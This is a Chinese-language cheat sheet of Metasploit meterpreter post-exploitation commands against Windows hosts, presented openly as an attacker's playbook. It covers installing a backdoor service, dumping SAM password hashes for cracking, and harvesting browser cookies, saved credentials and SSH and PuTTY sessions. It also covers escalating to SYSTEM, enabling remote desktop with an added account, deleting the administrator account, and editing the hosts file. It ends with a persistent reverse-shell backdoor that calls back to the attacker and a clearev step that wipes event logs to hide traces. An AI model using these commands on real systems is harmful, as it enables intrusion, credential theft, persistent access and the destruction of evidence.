创建服务作为后门
meterpreter > run metsvc
查看目标主机的内网IP段情况
meterpreter > run get_local_subnets
添加路由表和对应的session
route add 192.168.1.0 255.255.255.0 1
查看路由表
route print
读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码
meterpreter > run post/windows/gather/enum_ie
获取目标主机上最近访问过的文档、链接信息
meterpreter > run post/windows/gather/dumplinks
在获得system权限的情况下,使用hashdump命令可以到处目标主机的SAM文件,获取目标主机的账号密码hash信息,剩下的可以用爆破软件算出明文密码
meterpreter > hashdump
使用getsystem提升当前进城执行账户微system用户,拿到系统最高权限
meterpreter > getsystem
开启目标主机远程桌面
meterpreter > run getgui -e
开启目标主机的远程桌面服务后,可以添加账号以便利用
meterpreter > run getgui -u example_username -p example_password
收集目标tomcat信息
meterpreter > run post/windows/gather/enum_tomcat
枚举电脑保存的putty 主机信息、putty的session
meterpreter > run post/windows/gather/enum_putty_saved_sessions
通过arp方式内网扫描ip
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
目标主机上的身份认证信息
meterpreter > run post/windows/gather/credentials/credential_collector
目标主机安装了哪些软件
meterpreter > run post/windows/gather/enum_applications
目标主机当前在线的用户
meterpreter > run post/windows/gather/enum_logged_on_users
目标主机存在哪些本地提权漏洞
meterpreter > run post/multi/recon/local_exploit_suggester
删除目标主机的administrator账号
meterpreter > run post/windows/manage/delete_user USERNAME=administrator
目标主机环境变量信息
meterpreter > run post/multi/gather/env
目标主机保存的ssh身份验证信息
meterpreter > run post/multi/gather/ssh_creds
修改目标主机的host文件
meterpreter > run post/windows/manage/inject_host ip=xxx.xxx.xxx.xxx domain=www.baidu.com
向目标主机写入后门 例如:run persistence -X 开机启动 -i 每隔多少秒执行一次 -r xxx.xxx.xxx.xxx -p msf监听的端口
meterpreter > run persistence
关于 persistence(持久后门) 参数说明
-A 自动生成一个回连的meterpreter,默认地址4444
-L <opt>如果不设置,默认写入payload 到目标的%TEMP%目录
-P <opt>默认使用 windows/meterpreter/reverse_tcp,如果其他平台需要设置这个值
-S 在目标启动时,作为服务启动。必须要有root或者system权限
-T <opt>备用的第二个后门,一般是执行时就带上 -T local-path/.exe
-U 用户登录时,自动回连
-X 开机自动回连
-h This help menu
-i <opt>回连间隔 单位,次/秒
-p <opt>msf监听的端口
-r <opt>运行msf的ip
最后擦屁股:清理痕迹
clearev